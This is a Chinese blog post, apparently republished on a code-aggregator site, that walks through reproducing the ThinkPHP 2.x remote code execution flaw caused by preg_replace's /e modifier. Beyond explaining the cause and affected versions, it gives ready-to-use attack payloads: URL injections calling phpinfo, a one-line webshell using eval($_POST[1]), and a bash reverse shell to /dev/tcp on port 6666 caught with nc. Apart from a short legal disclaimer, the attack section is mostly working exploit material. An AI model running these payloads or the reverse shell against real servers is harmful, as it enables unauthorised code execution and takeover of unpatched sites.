码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 复现Thinkphp 2.x 任意代码执行漏洞


    警告

    请勿使用本文提到的内容违反法律。
    本文不提供任何担保

    目录

    警告

    一、漏洞描述

    二、漏洞原理

    三、影响版本

    四、漏洞原理

    五、漏洞复现

    在线沙箱 进行尝试:

    7.0以下的版本 存在/e 就可以任意代码执行:

    六、漏洞验证

     反弹shell


     一、漏洞描述

            ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架,这个框架曾经爆出各种RCE和SQL注入漏洞。由于 ThinkPHP 中没有对控制器进行检测,导致在没有开启强制路由的情况下攻击者可以通过此漏洞进行远程命令执行。


     二、漏洞原理

    ThinkPHP2.x版本中,使用 preg_replace的/e模式匹配路由:

    1. $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,
    2. $paths));

    导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。


    三、影响版本

    • ThinkPHP 2.x
    • ThinkPHP3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

    四、漏洞原理

    由于是preg_replace这个函数引起的漏洞,所以先来看看preg_replace这个函数

    这个函数是个替换函数,而且支持正则,使用方式如下:

    preg_replace('正则规则','替换字符','目标字符')

    这个函数的3个参数,结合起来的意思是:

    如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞:

    1. e -->配合函数preg_replace()使用,可以把匹配来的字符串当作正则表达式执行
    2. /e-->可执行模式,此为PHP专有参数,例如 preg_replace函数。

    五、漏洞复现

    在线沙箱 进行尝试:

    沙箱地址: PHP Sandbox - Execute PHP code online through your browser

    <?php @preg_replace('/test/e','print_r("xiaofeng");','just test');?>

     7.0以下的版本 存在/e 就可以任意代码执行:

      7.0以上的版本 存在/e不可以:


    六、漏洞验证

    1. /index.php?s=/index/index/name/${@phpinfo()}
    2. /index.php?s=/index/index/name/$%7B@phpinfo()%7D

    构造一句话木马:

    http://xxxxx:8080/index.php?s=/index/index/xxx/${@print(eval($_POST[1]))}

     

     反弹shell:

    bash -i >& /dev/tcp/x.x.x.x/6666 0>&1

    写shell,python开启http服务:

     nc开启监听:

    进行执行,反弹shell:

     

     成功反弹到shell!

  • 相关阅读:
    Golang Context 的并发安全性探究
    学习记录——ipv4、ipv6与ip、DNS、网络协议
    Vue-router
    ECharts
    SQL注入的原理分析
    Docker consul的容器服务更新与发现
    【单词】【2012】
    纯JSP MySQL分页
    实操Hadoop大数据高可用集群搭建(hadoop3.1.3+zookeeper3.5.7+hbase3.1.3+kafka2.12)
    CSS经典布局--圣杯布局和双飞翼布局
  • 原文地址:https://blog.csdn.net/xiaofengdada/article/details/125586100
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号